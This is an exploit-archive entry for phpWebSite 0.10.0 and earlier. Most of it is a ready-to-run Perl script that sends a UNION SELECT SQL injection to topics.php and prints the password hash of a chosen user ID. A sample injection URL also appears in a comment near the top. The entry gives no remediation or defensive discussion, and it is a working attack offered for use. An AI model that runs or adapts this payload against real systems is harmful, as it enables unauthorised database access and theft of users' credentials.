phpWebSite <= 0.10.0-full (topics.php) Remote SQL Injection Exploit

2006-02-24T00:00:00
ID 1337DAY-ID-274
Type zdt
Reporter SnIpEr_SA
Modified 2006-02-24T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ===================================================================
phpWebSite <= 0.10.0-full (topics.php) Remote SQL Injection Exploit
===================================================================




#!/usr/bin/perl
# 
# advisory sent in by SnIpEr_SA (selfar2002[at]hotmail.com)
# http://www.target.com/topics.php?op=viewtopic&topic=-1%20Union%20select%20name,name,pass,name%20From%20users%20where%20uid=1

use LWP::Simple;

$serv     =  $ARGV[0];
$path     =  $ARGV[1];
$uid      =  $ARGV[2];

sub usage
 {
    print "\nUsage: $0 [server] [path] [username] \n";
    print "sever    -  URL\n";
    print "path     -  path to topics.php\n";
    print "uid      -  uid of the user\n\n";
    exit ();}

sub work
 {
    print qq(
       ---------------------------------
#==---[ phpWebSite topic SQL-Injection  |
       ---------------------------------\n\n);&board}

sub board
 {
    $URL = sprintf("http://%s%s/topics.php?op=viewtopic&topic=-1+Union+select+name,name,pass,name+From+users+where+uid=%s",$serv,$path,$uid);
    $content = get "$URL";
    if ($content =~ /(\w{32})/){&showh;}else{print "... One of those days :)\n";}}

sub showh
 {
    print "[*] User: $uid Hash: $1\n\n";}

if (@ARGV != 3){&usage;}else{&work;}



#  0day.today [2018-01-03]  #